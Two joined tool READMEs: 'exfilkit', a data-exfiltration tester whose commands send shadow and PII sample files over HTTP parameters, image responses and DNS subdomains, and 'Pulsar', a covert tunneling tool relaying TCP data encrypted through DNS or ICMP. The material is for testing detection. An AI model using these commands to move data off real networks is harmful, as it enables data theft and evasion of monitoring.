Data exfiltration utility for testing detection capabilities
Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets.
First, getting the code from repository and compile it with following command:
$ cd pulsar
$ export GOPATH=$(shell pwd)
$ go get golang.org/x/net/icmp
$ go build -o bin/pulsar src/main.go
or run:
$ make
A connector is a simple channel to the external world, with the connector you can read and write data from different sources.
Read and write data through tcp connections
tcp:127.0.0.1:9000
Read and write data through udp packet
udp:127.0.0.1:9000
Read and write data through icmp packet
icmp:127.0.0.1 (the connection port is obviously useless)
Read and write data through dns packet
dns:fakedomain.net@127.0.0.1:1994
You can use option --in in order to select input connector and option --out to select output connector:
--in tcp:127.0.0.1:9000
--out dns:fkdns.lol:2.3.4.5:8989
A handler allows you to change data in transit, you can combine handlers arbitrarily.
Stub:
Base32
Base32 encoder/decoder
--handlers base32
Base64
Base64 encoder/decoder
--handlers base64
Cipher
CTR cipher, support AES/DES/TDES in CTR mode (Default: AES)
--handlers cipher:<key|[aes|des|tdes#key]>
You can use the --decode option to use ALL handlers in decoding mode
--handlers base64,base32,base64,cipher:key --decode
In the following example Pulsar will be used to create a secure two-way tunnel on DNS protocol, data will be read from TCP connection (simple nc client) and resend encrypted through the tunnel.
[nc 127.0.0.1 9000] <--TCP--> [pulsar] <--DNS--> [pulsar] <--TCP--> [nc -l 127.0.0.1 -p 9900]
192.168.1.198:
$ ./pulsar --in tcp:127.0.0.1:9000 --out dns:test.org@192.168.1.199:8989 --duplex --plain in --handlers 'cipher:supersekretkey!!'
$ nc 127.0.0.1 9000
192.168.1.199:
$ nc -l 127.0.0.1 -p 9900
$ ./pulsar --in dns:test.org@192.168.1.199:8989 --out tcp:127.0.0.1:9900 --duplex --plain out --handlers 'cipher:supersekretkey!!' --decode
All contributions are always welcome